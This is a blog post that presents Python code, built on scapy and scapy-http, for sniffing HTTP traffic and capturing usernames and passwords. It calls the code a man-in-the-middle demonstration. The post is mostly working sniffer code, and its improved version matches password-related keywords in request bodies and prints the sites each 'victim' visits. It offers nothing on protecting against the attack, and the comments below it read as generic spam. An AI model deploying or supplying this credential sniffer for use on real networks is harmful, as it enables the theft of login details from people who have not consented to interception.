[python]Capturing username and password from http login

Clear text site
Nowadays it is quite rare to find http login page, because http is insecure, information sent towards the http site is all clear text, if there is a man in the middle sniffing packets to reveal the username and password is possible.

Sniffing class
I have written a class in python to demonstrate this man in the middle sniffing. Doing man in the middle is easier sad than done, you need to find a way to intercept traffic sent from the original host.

The module I am using is scapy and scapy-http. Scapy does not have a http filter and hence cannot get the header and payload in the http, scapy-http has a http filter which can capture the entire http payload.

import scapy.all # packet capture module
from scapy_http import http # supplementing scapy module by providing http filter
from urllib.parse import unquote # to make url encoded text into string

# main class known as sniffing, the class file is k9.py
class sniffing:
    def __init__(self, interface, filter=""):
        self.sniffs(interface, filter) # filter is optional, default is empty string
        # filter can be "port 80", "tcp", "udp", "udp", "port 21" etc...

# The method that does the packet processing, by printing out packets sniff by scapy.
    def processing_packets(self, pkt):
        if pkt.haslayer(http.HTTPRequest): # http request filter
            if pkt.haslayer(scapy.all.Raw): # Raw data within the http packet which contains user and pwd.
                print(unquote(str(pkt[scapy.all.Raw]))) # print out the raw packet that has username and password.

# The method that calls scapy, this is the actual method that does the work.
    def sniffs(self, interface, filter):
        return scapy.all.sniff(iface=interface, store=0, prn=self.processing_packets, filter=filter)

This is the main code that executes the script:

import k9

try:
    k9.sniffing('en0')

except KeyboardInterrupt:
    print('Exit...')

Result

Below is an improvement of the sniffing class, to only print out if username and password variables are present else do not print, also review the site the username and password is used.

from scapy import all as scapy # packet capture module
from scapy_http import http # supplementing scapy module by providing http filter
from urllib.parse import unquote # to make url encoded text into string

# keywords guessing the variable use for username and password
keywords = ['pass', 'password', 'usr', 'username', 'user', 'pwd']


class sniffing():
    def __init__(self, interface, filter=""):
        self.sniffs(interface, filter)

    def processing_data(self, pkt):
        if pkt.haslayer(http.HTTPRequest): # look for http request
            print(pkt[http.HTTPRequest].Host + pkt[http.HTTPRequest].Path) # print the URL, the victim visits
            if pkt.haslayer(scapy.Raw): # username and password appears in raw field
                for keyword in keywords: # check if each keyword exists
                    if keyword in str(pkt[scapy.Raw]): # in the raw field
                        print(unquote(str(pkt[scapy.Raw]))) # if exists, print out the content once.
                        break

    def sniffs(self, interface, filter):
        return scapy.sniff(iface=interface, store=False, prn=self.processing_data, filter=filter)
Advertisements
This entry was posted in Python, Security and tagged , , . Bookmark the permalink.

2 Responses to [python]Capturing username and password from http login

  1. Excellent article. Keep posting such kind of information on your blog. Im really impressed by your blog.
    Hello there, You have performed a fantastic job. I will definitely digg it and in my view recommend to my friends. I am confident they’ll be benefited from this site.

  2. I have read so many articles regarding the blogger lovers but this piece of writing is really a pleasant article, keep it up.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s